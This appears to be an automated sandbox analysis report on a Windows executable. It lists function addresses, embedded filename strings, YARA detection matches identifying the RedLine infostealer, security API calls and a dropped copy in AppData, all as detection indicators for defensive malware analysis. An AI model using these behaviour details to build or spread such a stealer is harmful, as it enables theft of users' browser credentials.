                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09C320200_2_09C32020
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09F4C4800_2_09F4C480
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09F44BE80_2_09F44BE8
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09F443740_2_09F44374
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09F462C00_2_09F462C0
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09F447B00_2_09F447B0
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 0_2_09F45E880_2_09F45E88
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 8_2_02BEE7B08_2_02BEE7B0
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 8_2_02BEDC908_2_02BEDC90
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 8_2_067144688_2_06714468
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 8_2_067196288_2_06719628
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 8_2_067112108_2_06711210
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 8_2_067133208_2_06713320
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 8_2_0671D1088_2_0671D108
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeCode function: 8_2_0671DD008_2_0671DD00
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB282010_2_00FB2820
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB14D010_2_00FB14D0
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB1D9910_2_00FB1D99
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB9D2810_2_00FB9D28
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB86A910_2_00FB86A9
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB08D110_2_00FB08D1
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB58B810_2_00FB58B8
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB58A910_2_00FB58A9
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB897010_2_00FB8970
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB896010_2_00FB8960
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB5AF010_2_00FB5AF0
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB5D8010_2_00FB5D80
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB46B810_2_00FB46B8
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB46A910_2_00FB46A9
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB17D010_2_00FB17D0
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_00FB5F5010_2_00FB5F50
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_09D2203010_2_09D22030
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_09D2202010_2_09D22020
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_0A04BAB010_2_0A04BAB0
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_0A04180710_2_0A041807
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_0A04629010_2_0A046290
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_0A044BB810_2_0A044BB8
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_0A0466C810_2_0A0466C8
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 10_2_0A044FF010_2_0A044FF0
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 14_2_014AE7B014_2_014AE7B0
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 14_2_014ADC9014_2_014ADC90
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 14_2_06A9962814_2_06A99628
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 14_2_06A9446814_2_06A94468
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 14_2_06A9121014_2_06A91210
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 14_2_06A9331114_2_06A93311
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 14_2_06A9DD0014_2_06A9DD00
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 14_2_06A9CD1114_2_06A9CD11
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeCode function: 14_2_06A9D10814_2_06A9D108
                  Source: nzLoHpgAln.exe, 00000000.00000002.1751633310.0000000002814000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000000.00000002.1751633310.000000000240E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000000.00000002.1764633951.00000000095DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVGHA.exe, vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000000.00000000.1656400006.0000000000042000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVGHA.exe, vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000000.00000002.1764256150.00000000093C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000000.00000002.1764433116.0000000009574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000000.00000002.1765355652.0000000009EC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000000.00000002.1750655160.000000000084E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002DC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\080904B0\\OriginalFilename vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exeBinary or memory string: OriginalFilenameVGHA.exe, vs nzLoHpgAln.exe
                  Source: nzLoHpgAln.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: nzLoHpgAln.exe PID: 6176, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: nzLoHpgAln.exe PID: 7312, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: nzLoHpgAln.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: wZWwzQVEakJvEU.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, lF62eOBaEgEorXmRSl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, lF62eOBaEgEorXmRSl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: _0020.AddAccessRule
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, lF62eOBaEgEorXmRSl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: _0020.SetAccessControl
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 10.2.wZWwzQVEakJvEU.exe.4656068.2.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.nzLoHpgAln.exe.9ec0000.6.raw.unpack, lF62eOBaEgEorXmRSl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, lF62eOBaEgEorXmRSl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: _0020.AddAccessRule
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: _0020.SetAccessControl
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 10.2.wZWwzQVEakJvEU.exe.46b2688.5.raw.unpack, EDIZWacnsQLqU7bbhP.csSecurity API names: _0020.AddAccessRule
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/103@1/1
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile created: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
